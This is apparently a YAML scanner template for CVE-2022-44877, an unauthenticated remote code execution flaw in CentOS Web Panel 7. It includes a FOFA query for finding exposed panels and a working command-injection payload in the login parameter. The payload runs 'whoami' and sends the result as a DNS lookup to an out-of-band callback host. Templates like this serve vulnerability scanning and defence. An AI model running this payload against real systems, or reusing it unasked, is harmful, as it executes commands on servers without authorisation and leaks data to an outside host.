id: CVE-2022-44877

info:
  name: Centos Web Panel 7 Unauthenticated Remote Code
  author: xpoc
  severity: critical
  verified: false
  description: |
    FOFA: app="CWP-虚拟主机控制面板"
  reference:
    - https://github.com/numanturle/CVE-2022-44877
  tags: cwp7,rce
  created: 2023/06/22

set:
    reverse: newReverse()
    reverseDomain: reverse.url.host
rules:
  r0:
    request:
      method: POST
      path: /login/index.php?login=$(ping${IFS}-nc${IFS}2${IFS}`whoami`.{{reverseDomain}})
      body: username=root&password=toor&commit=Login
    expression: response.status == 302 && reverse.wait(5)
expression: r0()